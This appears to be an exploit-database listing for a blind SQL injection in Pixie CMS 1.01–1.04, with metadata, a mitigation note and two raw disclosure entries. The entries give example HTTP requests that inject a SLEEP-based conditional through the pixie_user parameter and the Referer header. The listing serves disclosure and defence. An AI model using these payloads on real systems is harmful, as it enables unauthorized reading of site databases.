header-logo
Suggest Exploit
vendor:
Pixie CMS
by:
Piranha
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Pixie CMS
Affected Version From: 01.01
Affected Version To: 01.04
Patch Exists: NO
Related CWE: None
CPE: a:pixie_cms:pixie_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Pixie CMS 1.01 – 1.04 “Referer” Blind SQL Injection

A Blind SQL Injection vulnerability exists in Pixie CMS versions 1.01 - 1.04. An attacker can send a specially crafted HTTP request with a malicious Referer header to the vulnerable application in order to execute arbitrary SQL commands. If the condition is true, the application will respond with a timeout of ~5 seconds.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

Exploit Title: Pixie CMS 1.01 - 1.04 "pixie_user" Blind SQL Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha, piranha[at]torontomail.com
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET http://localhost:8080/pixie_v1.04/?pixie_user=x',log_important=IF({CONDITION},SLEEP(5),NULL),log_id='1234
Host: localhost:8080
Referer: http://www.google.com/
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with timeout ~5 seconds. Notice that referer is required.

Exploit Title: Pixie CMS 1.01 - 1.04 "Referer" Blind SQL Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET http://localhost:8080/pixie_v1.04/
Host: localhost:8080
Referer: http://www.google.com',log_important=IF({CONDITION},SLEEP(5),NULL),log_id='1234
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with timeout ~5 seconds.

Navigation

Suggest Exploit

Services By CQR